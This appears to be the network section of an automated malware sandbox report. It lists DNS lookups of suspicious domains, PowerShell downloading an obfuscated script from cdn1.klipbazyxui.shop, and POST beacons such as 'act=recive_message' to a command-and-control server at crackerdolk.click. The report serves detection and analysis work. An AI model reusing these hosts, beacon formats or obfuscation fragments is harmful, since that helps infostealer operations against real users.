Dec 29, 2024 09:25:24.638684988 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:24.638720036 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:24.638788939 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:24.639100075 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:24.639117002 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.273315907 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.273390055 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:26.274848938 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:26.274854898 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.275083065 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.276154995 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:26.319339037 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.797211885 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.797261000 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.797357082 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:26.833960056 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:26.833992004 CET	443	49982	185.161.251.21	192.168.2.5
Dec 29, 2024 09:25:26.834006071 CET	49982	443	192.168.2.5	185.161.251.21
Dec 29, 2024 09:25:26.834012032 CET	443	49982	185.161.251.21	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 09:23:10.042923927 CET	54534	53	192.168.2.5	1.1.1.1
Dec 29, 2024 09:23:10.348978996 CET	53	54534	1.1.1.1	192.168.2.5
Dec 29, 2024 09:25:04.667570114 CET	54510	53	192.168.2.5	1.1.1.1
Dec 29, 2024 09:25:04.997836113 CET	53	54510	1.1.1.1	192.168.2.5
Dec 29, 2024 09:25:24.386349916 CET	61080	53	192.168.2.5	1.1.1.1
Dec 29, 2024 09:25:24.637893915 CET	53	61080	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 09:23:10.042923927 CET	192.168.2.5	1.1.1.1	0xb6b6	Standard query (0)	cdn1.klipbazyxui.shop	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.667570114 CET	192.168.2.5	1.1.1.1	0x439b	Standard query (0)	crackerdolk.click	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:24.386349916 CET	192.168.2.5	1.1.1.1	0x48ed	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 09:23:10.348978996 CET	1.1.1.1	192.168.2.5	0xb6b6	No error (0)	cdn1.klipbazyxui.shop	104.21.72.190	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:23:10.348978996 CET	1.1.1.1	192.168.2.5	0xb6b6	No error (0)	cdn1.klipbazyxui.shop	172.67.154.95	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:04.997836113 CET	1.1.1.1	192.168.2.5	0x439b	No error (0)	crackerdolk.click	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:25:24.637893915 CET	1.1.1.1	192.168.2.5	0x48ed	No error (0)	cegu.shop	185.161.251.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn1.klipbazyxui.shop

crackerdolk.click

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	104.21.72.190	443	7464	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:23:11 UTC	82	OUT	GET /vankok.vstx HTTP/1.1 Host: cdn1.klipbazyxui.shop Connection: Keep-Alive
2024-12-29 08:23:12 UTC	991	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:23:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 11335646 Connection: close X-Powered-By: Express ETag: W/"acf7de-Nz+itdwJjIei1Sg6zL05dqYH1ZM" Set-Cookie: connect.sid=s%3AeZEpxltijWtx9kd-UsTz-zIDvjVVAJOL.4VDAgwv9GAU6hYZHsLN%2Fin5rsH3XwwFZyy12dxRRHbY; Path=/; HttpOnly cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7YTbv9KojEiiRczugOwATdW1o6yrtx5ysDPLoOOS7UJk2yEbp6vcMARLqgV5glo9Ir4Zn4xeHYECxpN6Ua%2FdbIAHk77MIFnAb%2F%2BcIY5SN7UQWectEXKGOtHcY89EAyQpHvkz4xFj%2F4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9862fc0a9b0f74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1550&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=696&delivery_rate=1883870&cwnd=151&unsent_bytes=0&cid=0ec3e37b62a9cfd3&ts=722&x=0"
2024-12-29 08:23:12 UTC	378	IN	Data Raw: 24 65 62 59 79 33 32 4c 76 62 53 71 6b 37 75 6a 65 4c 48 68 4b 66 54 67 38 46 78 73 58 57 46 33 58 4b 72 78 33 78 63 33 52 51 41 51 6a 58 69 72 30 4e 54 68 66 42 42 75 43 44 72 52 35 34 38 31 6e 6c 52 62 69 4d 39 4d 44 61 37 6d 35 75 4e 49 31 47 64 72 6f 41 44 4d 58 51 69 31 68 55 43 68 70 52 31 65 76 50 6a 49 73 54 6b 34 50 33 37 4c 46 55 61 78 70 65 7a 62 4c 36 36 36 46 77 41 72 4b 36 5a 56 4b 4d 45 6b 71 71 74 72 44 35 32 47 4b 77 56 55 62 30 7a 32 68 7a 71 53 72 79 74 44 6f 48 39 4d 39 41 70 4d 4b 4a 67 4f 33 42 36 37 42 66 68 45 6b 49 6c 61 67 69 74 45 38 4d 78 58 37 52 35 51 46 34 68 52 45 4b 46 65 45 42 6f 6a 75 65 37 43 4a 68 58 61 59 31 68 6b 4b 73 73 6f 41 73 71 79 5a 50 41 71 53 5a 37 57 77 74 7a 39 39 53 35 6c 71 44 30 30 77 49 35 5a 6f 32 45 Data Ascii: $ebYy32LvbSqk7ujeLHhKfTg8FxsXWF3XKrx3xc3RQAQjXir0NThfBBuCDrR5481nlRbiM9MDa7m5uNI1GdroADMXQi1hUChpR1evPjIsTk4P37LFUaxpezbL666FwArK6ZVKMEkqqtrD52GKwVUb0z2hzqSrytDoH9M9ApMKJgO3B67BfhEkIlagitE8MxX7R5QF4hREKFeEBojue7CJhXaY1hkKssoAsqyZPAqSZ7Wwtz99S5lqD00wI5Zo2E
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 49 71 30 31 6c 34 32 6e 4d 73 42 70 33 63 62 49 64 61 56 6c 37 47 49 33 79 4e 77 4f 57 47 70 75 4d 70 77 72 6d 52 43 4d 5a 50 53 37 39 54 4c 69 57 57 4e 6f 46 4f 6d 74 53 6a 46 4e 49 49 4e 6d 67 66 72 6d 4b 44 43 37 5a 48 6d 5a 35 54 65 45 54 53 74 7a 39 64 41 69 42 45 66 58 41 32 61 59 66 6f 36 72 4b 44 34 46 75 61 4f 7a 68 78 44 6b 42 43 50 37 4c 74 5a 65 76 69 63 43 53 54 5a 4d 41 41 6e 58 6e 45 62 78 56 7a 69 35 77 39 4e 52 4f 38 50 4e 66 32 39 31 7a 6d 56 64 39 78 48 37 45 6b 67 47 38 7a 72 46 58 4c 50 61 32 49 42 37 70 53 44 4e 6e 4e 71 50 64 68 4e 35 68 4f 46 59 48 47 45 38 55 62 71 5a 20 3d 20 22 47 65 74 22 0d 0a 0d 0a 24 59 4f 76 38 56 35 75 42 62 63 4e 50 30 70 64 6d 31 72 51 6a 4d 5a 37 65 71 67 4b 75 69 65 71 20 3d 20 22 42 60 79 74 65 22 0d Data Ascii: Iq01l42nMsBp3cbIdaVl7GI3yNwOWGpuMpwrmRCMZPS79TLiWWNoFOmtSjFNIINmgfrmKDC7ZHmZ5TeETStz9dAiBEfXA2aYfo6rKD4FuaOzhxDkBCP7LtZevicCSTZMAAnXnEbxVzi5w9NRO8PNf291zmVd9xH7EkgG8zrFXLPa2IB7pSDNnNqPdhN5hOFYHGE8UbqZ = "Get"$YOv8V5uBbcNP0pdm1rQjMZ7eqgKuieq = "B`yte"
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 32 48 33 63 32 54 50 55 46 67 4b 35 4a 30 46 38 4b 59 77 34 73 6d 58 38 71 37 31 43 4d 54 38 32 67 66 39 50 6b 49 4d 4c 58 76 73 6c 66 48 46 66 73 44 43 57 52 33 75 76 30 50 54 58 67 54 71 76 63 64 37 56 63 57 64 6a 37 55 30 5a 7a 4e 72 79 6f 41 45 41 56 20 3d 20 28 24 65 62 59 79 33 32 4c 76 62 53 71 6b 37 75 6a 65 4c 48 68 4b 66 54 67 38 46 78 73 58 57 46 33 58 4b 72 78 33 78 63 33 52 51 41 51 6a 58 69 72 30 4e 54 68 66 42 42 75 43 44 72 52 35 34 38 31 6e 6c 52 62 69 4d 39 4d 44 61 37 6d 35 75 4e 49 31 47 64 72 6f 41 44 4d 58 51 69 31 68 55 43 68 70 52 31 65 76 50 6a 49 73 54 6b 34 50 33 37 4c 46 55 61 78 70 65 7a 62 4c 36 36 36 46 77 41 72 4b 36 5a 56 4b 4d 45 6b 71 71 74 72 44 35 32 47 4b 77 56 55 62 30 7a 32 68 7a 71 53 72 79 74 44 6f 48 39 4d 39 41 Data Ascii: 2H3c2TPUFgK5J0F8KYw4smX8q71CMT82gf9PkIMLXvslfHFfsDCWR3uv0PTXgTqvcd7VcWdj7U0ZzNryoAEAV = ($ebYy32LvbSqk7ujeLHhKfTg8FxsXWF3XKrx3xc3RQAQjXir0NThfBBuCDrR5481nlRbiM9MDa7m5uNI1GdroADMXQi1hUChpR1evPjIsTk4P37LFUaxpezbL666FwArK6ZVKMEkqqtrD52GKwVUb0z2hzqSrytDoH9M9A
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 57 77 37 6a 38 4c 55 46 4a 4d 7a 54 47 31 55 77 43 65 7a 46 6a 39 66 72 4f 6e 74 72 54 66 42 34 35 69 42 38 6c 4b 46 33 4e 39 32 59 5a 39 33 6f 39 6d 75 76 73 57 4f 45 36 6d 71 4c 34 4d 4a 49 41 38 44 47 5a 67 69 47 6d 36 4d 44 33 57 47 66 53 61 4a 4a 75 43 50 4d 46 4b 4b 63 6c 38 70 6e 6e 61 43 39 64 72 73 72 4f 71 4b 72 78 78 34 6e 57 6e 53 39 4c 58 79 32 44 67 76 35 6d 59 43 45 6d 4e 49 70 31 64 32 78 48 66 36 36 41 72 36 6b 34 72 7a 6d 33 6f 44 76 6e 46 39 32 48 4b 4d 51 69 59 30 76 37 46 4e 33 76 78 4f 72 62 43 38 72 6c 66 65 56 50 6d 77 51 38 54 57 33 52 78 53 66 77 66 77 49 65 43 73 6a 6f 4e 30 52 65 7a 75 7a 31 4f 6d 7a 49 75 63 6f 64 61 67 66 39 4f 46 61 57 70 39 50 61 70 74 53 41 49 6d 76 53 65 4d 46 53 47 75 6c 42 4e 68 49 78 75 59 74 56 32 6f Data Ascii: Ww7j8LUFJMzTG1UwCezFj9frOntrTfB45iB8lKF3N92YZ93o9muvsWOE6mqL4MJIA8DGZgiGm6MD3WGfSaJJuCPMFKKcl8pnnaC9drsrOqKrxx4nWnS9LXy2Dgv5mYCEmNIp1d2xHf66Ar6k4rzm3oDvnF92HKMQiY0v7FN3vxOrbC8rlfeVPmwQ8TW3RxSfwfwIeCsjoN0Rezuz1OmzIucodagf9OFaWp9PaptSAImvSeMFSGulBNhIxuYtV2o
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 2d 31 33 2a 31 38 29 29 29 2d 28 34 37 36 30 33 29 29 29 20 0d 0a 7b 0d 0a 24 61 4a 76 63 55 54 52 48 52 70 65 20 3d 20 39 31 34 0d 0a 24 59 6a 4b 50 6d 54 6c 51 20 3d 20 24 6d 78 4b 42 63 6c 76 79 53 70 57 0d 0a 7d 0d 0a 28 28 28 24 72 53 42 51 6e 73 6c 4b 6f 66 2d 33 2d 28 24 70 57 4d 74 73 43 76 73 2d 33 39 2d 24 51 75 76 4d 4c 78 4b 69 48 43 54 29 2d 28 28 32 32 2b 34 33 2d 31 31 29 29 29 29 29 20 0d 0a 7b 0d 0a 24 43 7a 69 78 54 52 72 79 58 57 4b 64 6d 75 20 3d 20 31 34 30 0d 0a 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 20 3d 20 24 76 68 78 71 55 79 59 63 0d 0a 7d 0d 0a 64 65 66 61 75 6c 74 20 7b 28 28 28 28 33 36 2b 31 2b 33 32 29 29 29 2a 32 31 2b 31 36 2d 28 38 2a 31 36 2b 34 31 29 2d 28 28 33 39 2d 31 31 2a 33 30 29 29 2d 28 31 35 37 39 29 29 7d Data Ascii: -1318)))-(47603))) {$aJvcUTRHRpe = 914$YjKPmTlQ = $mxKBclvySpW}((($rSBQnslKof-3-($pWMtsCvs-39-$QuvMLxKiHCT)-((22+43-11))))) {$CzixTRryXWKdmu = 140$werDTikakmbJr = $vhxqUyYc}default {((((36+1+32)))21+16-(816+41)-((39-1130))-(1579))}
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 37 2d 31 32 2d 32 39 2d 28 31 35 39 35 29 29 0d 0a 24 50 59 6d 54 75 72 63 58 20 3d 20 28 28 28 28 33 33 2d 36 2b 28 24 6a 72 4f 67 46 55 56 49 64 2b 34 38 2b 24 59 73 4f 70 4b 57 76 7a 52 29 2b 24 54 58 70 4b 6b 75 6c 66 4f 4e 7a 2d 38 2d 33 38 29 29 29 2d 28 33 30 31 29 29 0d 0a 24 6a 62 69 41 57 63 4c 4d 78 4f 49 68 4a 4f 20 3d 20 28 28 35 2d 36 2b 24 6f 72 6a 4d 70 65 4e 2b 28 24 77 47 6c 7a 75 2b 36 2b 28 24 4e 4d 45 47 52 4f 2b 32 39 2b 39 29 29 29 2d 28 34 37 32 29 29 0d 0a 24 62 67 79 52 64 56 4d 74 49 73 65 4b 20 3d 20 28 28 28 28 24 75 68 58 66 59 2d 31 2b 24 54 58 70 4b 6b 75 6c 66 4f 4e 7a 29 29 2b 28 28 35 2b 34 2d 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 29 29 29 2d 28 34 30 2d 33 33 2d 31 29 2d 28 32 35 29 29 0d 0a 24 73 47 45 52 79 74 50 Data Ascii: 7-12-29-(1595))$PYmTurcX = ((((33-6+($jrOgFUVId+48+$YsOpKWvzR)+$TXpKkulfONz-8-38)))-(301))$jbiAWcLMxOIhJO = ((5-6+$orjMpeN+($wGlzu+6+($NMEGRO+29+9)))-(472))$bgyRdVMtIseK = (((($uhXfY-1+$TXpKkulfONz))+((5+4-$LbCtZLCSWvRSw)))-(40-33-1)-(25))$sGERytP
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 4e 72 72 29 29 2b 28 24 76 68 78 71 55 79 59 63 2d 33 32 2d 31 38 29 2b 28 28 24 45 53 4b 57 51 6c 4e 6b 56 75 2b 33 2d 33 33 29 29 2d 28 37 31 35 29 29 0d 0a 24 47 6f 78 51 4b 57 67 6e 75 4c 6d 20 3d 20 28 28 28 24 5a 79 71 47 47 2d 34 35 2d 33 30 2b 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 2d 33 35 2d 28 24 42 78 4c 47 45 74 53 4f 59 2d 32 2d 24 71 41 73 6e 76 50 62 50 6a 57 75 73 46 2d 28 28 31 36 2d 34 34 2b 24 48 50 41 73 62 67 79 5a 58 64 59 42 76 29 29 2d 34 34 2b 34 38 2b 34 36 29 29 29 2d 28 31 33 39 29 29 0d 0a 24 4b 70 4f 6b 58 44 45 53 72 62 7a 66 73 4a 20 3d 20 28 28 28 31 36 2b 32 35 2b 34 36 29 29 2d 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 2b 32 39 2b 32 2b 28 34 31 2b 32 39 2d 28 24 72 7a 74 47 4b 63 41 70 49 73 79 2b 33 33 2d 34 35 29 Data Ascii: Nrr))+($vhxqUyYc-32-18)+(($ESKWQlNkVu+3-33))-(715))$GoxQKWgnuLm = ((($ZyqGG-45-30+$werDTikakmbJr-35-($BxLGEtSOY-2-$qAsnvPbPjWusF-((16-44+$HPAsbgyZXdYBv))-44+48+46)))-(139))$KpOkXDESrbzfsJ = (((16+25+46))-$LbCtZLCSWvRSw+29+2+(41+29-($rztGKcApIsy+33-45)
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 72 53 42 51 6e 73 6c 4b 6f 66 2b 34 2b 28 32 38 2b 34 32 2b 33 34 29 2d 28 33 35 37 29 29 0d 0a 24 45 6c 6f 6a 4e 6d 59 43 70 20 3d 20 28 28 28 24 5a 74 76 6d 6c 2d 33 37 2d 28 24 48 43 53 70 52 66 77 4b 41 41 2d 33 35 2b 24 72 7a 74 47 4b 63 41 70 49 73 79 29 2b 31 36 2b 31 38 2d 24 75 68 58 66 59 29 2b 28 32 36 2d 32 33 2d 24 6b 57 47 68 4f 54 55 7a 58 4e 53 65 68 51 29 2b 28 28 32 38 2d 31 32 2d 33 35 29 29 29 2b 28 37 32 36 29 29 0d 0a 24 74 6d 41 7a 55 59 75 72 4b 78 20 3d 20 28 28 33 39 2b 37 2d 31 29 2b 28 24 6b 58 7a 74 51 52 41 2b 31 33 2d 28 24 6b 68 63 4e 65 4c 78 2b 33 2b 24 6b 57 47 68 4f 54 55 7a 58 4e 53 65 68 51 2b 24 64 74 57 45 48 47 4f 77 69 6e 2b 34 2b 31 37 29 29 2b 28 36 38 34 29 29 0d 0a 24 41 4e 65 43 66 4d 4a 49 79 4a 6f 4d 56 20 Data Ascii: rSBQnslKof+4+(28+42+34)-(357))$ElojNmYCp = ((($Ztvml-37-($HCSpRfwKAA-35+$rztGKcApIsy)+16+18-$uhXfY)+(26-23-$kWGhOTUzXNSehQ)+((28-12-35)))+(726))$tmAzUYurKx = ((39+7-1)+($kXztQRA+13-($khcNeLx+3+$kWGhOTUzXNSehQ+$dtWEHGOwin+4+17))+(684))$ANeCfMJIyJoMV
2024-12-29 08:23:12 UTC	1369	IN	Data Raw: 65 6a 57 63 74 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 57 6e 44 69 52 4c 72 61 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6c 6d 6c 6e 6b 71 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 48 59 70 47 4c 45 66 4b 62 42 52 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 45 6c 6f 6a 4e 6d 59 43 70 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 74 6d 41 7a 55 59 75 72 4b 78 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 41 4e 65 43 66 4d 4a 49 79 4a 6f 4d 56 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 64 71 6d 4b 5a 46 53 74 53 58 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 59 62 54 76 53 55 6a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6a 4a 65 54 51 50 53 6c 4d 4b 29 0d 0a 0d 0a 24 4c 74 68 4e 73 4b 72 65 75 78 42 20 3d 20 38 36 0d 0a 24 54 74 6a 70 6d 44 Data Ascii: ejWct + [char][int]$WnDiRLra + [char][int]$lmlnkq + [char][int]$HYpGLEfKbBR + [char][int]$ElojNmYCp + [char][int]$tmAzUYurKx + [char][int]$ANeCfMJIyJoMV + [char][int]$dqmKZFStSX + [char][int]$YbTvSUj + [char][int]$jJeTQPSlMK)$LthNsKreuxB = 86$TtjpmD
2024-12-29 08:23:12 UTC	1185	IN	Data Raw: 57 4d 74 73 43 76 73 2d 33 39 2d 24 51 75 76 4d 4c 78 4b 69 48 43 54 29 2d 28 28 32 32 2b 34 33 2d 31 31 29 29 29 29 29 20 0d 0a 7b 0d 0a 24 43 7a 69 78 54 52 72 79 58 57 4b 64 6d 75 20 3d 20 31 34 30 0d 0a 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 20 3d 20 24 76 68 78 71 55 79 59 63 0d 0a 7d 0d 0a 64 65 66 61 75 6c 74 20 7b 28 28 28 28 33 36 2b 31 2b 33 32 29 29 29 2a 32 31 2b 31 36 2d 28 38 2a 31 36 2b 34 31 29 2d 28 28 33 39 2d 31 31 2a 33 30 29 29 2d 28 31 35 37 39 29 29 7d 0d 0a 7d 24 5a 74 76 6d 6c 20 3d 20 34 35 31 0d 0a 24 74 4b 68 72 6e 52 43 70 78 20 3d 20 28 28 28 33 38 2b 34 35 2b 34 34 2d 28 28 31 2d 32 32 2a 32 36 2b 28 34 32 2d 33 35 2b 31 36 29 29 29 29 2d 28 36 35 31 29 29 29 0d 0a 24 64 74 57 45 48 47 4f 77 69 6e 20 3d 20 28 28 28 33 2b Data Ascii: WMtsCvs-39-$QuvMLxKiHCT)-((22+43-11))))) {$CzixTRryXWKdmu = 140$werDTikakmbJr = $vhxqUyYc}default {((((36+1+32)))21+16-(816+41)-((39-1130))-(1579))}}$Ztvml = 451$tKhrnRCpx = (((38+45+44-((1-2226+(42-35+16))))-(651)))$dtWEHGOwin = (((3+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49931	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: crackerdolk.click
2024-12-29 08:25:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-29 08:25:07 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1gh0ljom36ji6bves5kj75o8s5; expires=Thu, 24 Apr 2025 02:11:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyCD21SQWNiKvgMZrksVxf1UrYpFRUhe9SlohcsU83DLaqU6B7Abe77rdgUwMU7OtTSqt1qFzludAIqIBxqHdxB3pmoVjL%2FpDi%2BH3NKh8awQ%2FvBbS8Tlxg2rmyZ4Njsecz%2BgQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9865c7f83843e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1638&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=908&delivery_rate=1712609&cwnd=242&unsent_bytes=0&cid=44f92d1718e006ae&ts=863&x=0"
2024-12-29 08:25:07 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-29 08:25:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49936	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: crackerdolk.click
2024-12-29 08:25:08 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--bigJ&j=aa77e78b6b0dd1b2226e7b799532ab3a
2024-12-29 08:25:10 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=odbvgvufesd2uhilvi4fonbnk0; expires=Thu, 24 Apr 2025 02:11:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2YW2t68oFOZA8JArepf5WdDNBnFfzAnt7VNSvN1P9HzOq169dAJw%2FfQMI17%2B9kpHhbwTIkF4YYgbAUydohKe%2Fa3mD2buyCxy%2FXNZISmaqzrdELhrbD2VtSfJyLv1Ww0hWSADiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9865d5ac9dc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1617&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=979&delivery_rate=1688837&cwnd=244&unsent_bytes=0&cid=37b6ba82b020ea6e&ts=1942&x=0"
2024-12-29 08:25:10 UTC	237	IN	Data Raw: 31 63 61 33 0d 0a 6b 2b 63 64 49 72 53 54 72 76 79 54 31 42 49 77 77 46 49 6c 36 70 2b 5a 65 51 55 57 66 39 62 76 69 30 52 33 38 55 6b 68 6d 31 37 6f 78 57 73 41 6a 71 65 43 33 75 43 78 4d 41 71 6d 4d 30 6d 5a 2b 72 56 62 5a 48 4a 64 37 49 6e 71 4b 41 53 55 5a 51 50 74 4d 37 48 64 65 30 50 59 34 4d 76 51 73 62 46 71 45 76 6f 4a 58 73 6a 36 39 31 73 2f 4e 42 71 38 6a 65 6f 6f 46 5a 41 69 54 75 73 79 38 49 39 78 52 64 7a 32 7a 5a 6a 79 75 48 39 56 70 54 64 45 67 50 48 77 46 47 31 37 58 66 72 4e 37 6a 35 56 79 32 74 73 2f 69 72 79 71 6e 78 52 33 37 48 54 30 4f 6a 32 64 31 37 69 61 41 65 4c 2b 76 73 56 59 33 49 55 76 6f 66 6a 49 42 53 56 49 31 48 79 4f 50 75 50 66 30 62 64 2f 4d 53 4d 2f 37 4a 34 58 71 4d Data Ascii: 1ca3k+cdIrSTrvyT1BIwwFIl6p+ZeQUWf9bvi0R38Ukhm17oxWsAjqeC3uCxMAqmM0mZ+rVbZHJd7InqKASUZQPtM7Hde0PY4MvQsbFqEvoJXsj691s/NBq8jeooFZAiTusy8I9xRdz2zZjyuH9VpTdEgPHwFG17XfrN7j5Vy2ts/iryqnxR37HT0Oj2d17iaAeL+vsVY3IUvofjIBSVI1HyOPuPf0bd/MSM/7J4XqM
